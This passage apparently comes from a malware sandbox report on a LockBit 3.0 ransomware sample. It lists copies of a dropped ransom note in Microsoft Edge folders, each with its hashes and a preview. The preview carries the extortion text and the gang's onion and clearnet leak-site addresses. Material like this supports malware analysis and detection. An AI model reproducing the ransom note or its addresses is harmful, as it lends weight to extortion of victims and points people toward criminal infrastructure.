browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Extensions\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\PlayReady\InPrivate\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\PlayReady\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\UrlBlock\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
